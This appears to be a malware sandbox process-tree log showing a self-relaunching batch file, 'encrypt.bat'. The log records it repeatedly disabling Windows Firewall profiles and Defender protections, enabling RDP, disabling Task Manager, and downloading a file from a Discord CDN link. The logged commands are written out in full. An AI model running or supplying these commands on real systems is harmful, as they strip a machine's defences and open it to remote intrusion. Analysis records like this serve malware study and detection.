C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off28⤵PID:1344
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off28⤵PID:1236
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off28⤵PID:5052
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"28⤵PID:3320
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"28⤵PID:5036
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"28⤵PID:2804
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"28⤵
- Command and Scripting Interpreter: PowerShell
PID:2244
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"28⤵PID:1076
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"28⤵PID:1612
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"28⤵PID:264
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"28⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
PID:1772 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"29⤵PID:2804
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"30⤵PID:4572
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f30⤵PID:1108
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"30⤵PID:416
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f30⤵PID:4784
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"30⤵PID:1628
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"30⤵PID:4300
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"30⤵PID:2868
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"30⤵PID:1748
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"30⤵PID:3244
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable30⤵PID:736
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE30⤵PID:5052
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off30⤵PID:4616
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off30⤵PID:4796
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off30⤵PID:5096
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off30⤵PID:4296
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off30⤵PID:1236
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"30⤵PID:4704
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"30⤵PID:1828
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"30⤵PID:4116
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"30⤵PID:4380
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"30⤵PID:4576
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"30⤵PID:2012
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"30⤵
- Blocklisted process makes network request
PID:4588
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"30⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
PID:1828 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"31⤵PID:4800
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV132⤵PID:3056
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"32⤵PID:4860
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f32⤵PID:1624
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"32⤵PID:4176
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f32⤵PID:2396
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"32⤵PID:4816
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"32⤵PID:448
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"32⤵PID:4904
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"32⤵
- Command and Scripting Interpreter: PowerShell
PID:4564
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"32⤵PID:2228
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable32⤵PID:3052
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE32⤵
- Modifies Windows Firewall
PID:3024
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off32⤵PID:4108
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off32⤵PID:4436
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off32⤵
- Modifies Windows Firewall
PID:4380
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off32⤵PID:1340
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off32⤵PID:4936
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"32⤵PID:4576
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"32⤵PID:4856
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"32⤵PID:792
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"32⤵PID:1128
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"32⤵PID:2916
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"32⤵PID:1076
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"32⤵
- Blocklisted process makes network request
PID:4836
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"32⤵
- Command and Scripting Interpreter: PowerShell
PID:3520 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"33⤵PID:4656
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV134⤵PID:264
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"34⤵PID:1624
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f34⤵PID:2244
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"34⤵PID:2524
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f34⤵PID:4208
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"34⤵PID:2432
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"34⤵PID:4380
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"34⤵PID:3016
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"34⤵PID:3060
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"34⤵PID:2472
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable34⤵PID:3864
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE34⤵
- Modifies Windows Firewall
PID:1384
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off34⤵PID:5000
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off34⤵PID:1816
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off34⤵
- Modifies Windows Firewall
PID:1232
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off34⤵PID:416
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off34⤵PID:4936
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"34⤵PID:4968
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"34⤵PID:3684
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"34⤵PID:4512
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"34⤵PID:4988
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"34⤵PID:3064
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"34⤵PID:1708
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"34⤵
- Blocklisted process makes network request
PID:1748
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"34⤵
- Command and Scripting Interpreter: PowerShell
PID:1076 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"35⤵PID:4444
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"36⤵PID:4584
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f36⤵PID:2540
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"36⤵PID:1136
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f36⤵PID:3888
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"36⤵
- Command and Scripting Interpreter: PowerShell
PID:532
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"36⤵PID:1344
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"36⤵PID:5032
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"36⤵
- Command and Scripting Interpreter: PowerShell
PID:2964
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"36⤵PID:2860
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable36⤵PID:4360
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE36⤵PID:5000
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off36⤵PID:4188
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off36⤵PID:1828
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off36⤵PID:4016
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off36⤵PID:164
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off36⤵PID:1984
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"36⤵PID:4816
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"36⤵PID:3344
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"36⤵PID:3716
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"36⤵PID:3436
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"36⤵PID:4488
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"36⤵PID:1984
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"36⤵
- Blocklisted process makes network request
PID:4616
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"36⤵
- Command and Scripting Interpreter: PowerShell
PID:2984 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"37⤵PID:4608
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"38⤵PID:4864
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f38⤵PID:2540
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"38⤵PID:4176
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f38⤵PID:4184
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"38⤵PID:4508
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"38⤵PID:4000
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"38⤵PID:4088
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"38⤵PID:716
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"38⤵PID:4676
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable38⤵PID:4544
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE38⤵
- Modifies Windows Firewall
PID:5000
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off38⤵PID:1100
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off38⤵PID:2288
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off38⤵
- Modifies Windows Firewall
PID:2868
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off38⤵PID:2244
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off38⤵PID:3520
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"38⤵PID:3864
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"38⤵PID:1448
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"38⤵PID:1856
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"38⤵PID:716
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"38⤵PID:420
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"38⤵PID:4120
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"38⤵
- Blocklisted process makes network request
PID:3700
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"38⤵
- Command and Scripting Interpreter: PowerShell
PID:1448 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"39⤵PID:2752
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"40⤵PID:4532
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f40⤵PID:3076
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"40⤵PID:4176
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f40⤵PID:3084
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"40⤵PID:4956
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"40⤵PID:2288
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"40⤵PID:2012
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"40⤵PID:4576
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"40⤵PID:4984
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable40⤵
- Modifies Windows Firewall
PID:2384
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE40⤵PID:364
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off40⤵
- Modifies Windows Firewall
PID:1816
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off40⤵PID:4528
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off40⤵PID:2944
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off40⤵PID:4208
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off40⤵
- Modifies Windows Firewall
PID:2624
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"40⤵PID:4544
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"40⤵PID:4796
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"40⤵PID:5052
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"40⤵PID:448
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"40⤵PID:2540
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"40⤵PID:4676
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"40⤵
- Blocklisted process makes network request
PID:3872
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"40⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
PID:4008 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"41⤵PID:1584
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"42⤵PID:1460
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f42⤵PID:1420
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"42⤵PID:3180
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f42⤵PID:3132
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"42⤵PID:3008
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"42⤵PID:4528
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"42⤵PID:3548
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"42⤵PID:3260
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"42⤵PID:1532
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable42⤵PID:3716
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE42⤵
- Modifies Windows Firewall
PID:2388
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off42⤵PID:364
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off42⤵
- Modifies Windows Firewall
PID:4572
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off42⤵PID:4492
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off42⤵PID:4172
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off42⤵
- Modifies Windows Firewall
PID:440
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"42⤵PID:2868
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"42⤵PID:3684
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"42⤵PID:1076
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"42⤵PID:4980
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"42⤵PID:164
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"42⤵PID:1816
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"42⤵
- Blocklisted process makes network request
PID:2228
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"42⤵
- Command and Scripting Interpreter: PowerShell
PID:2740 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"43⤵PID:3872
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"44⤵PID:2256
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f44⤵PID:2004
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"44⤵PID:2852
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f44⤵PID:4608
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"44⤵PID:980
-
-
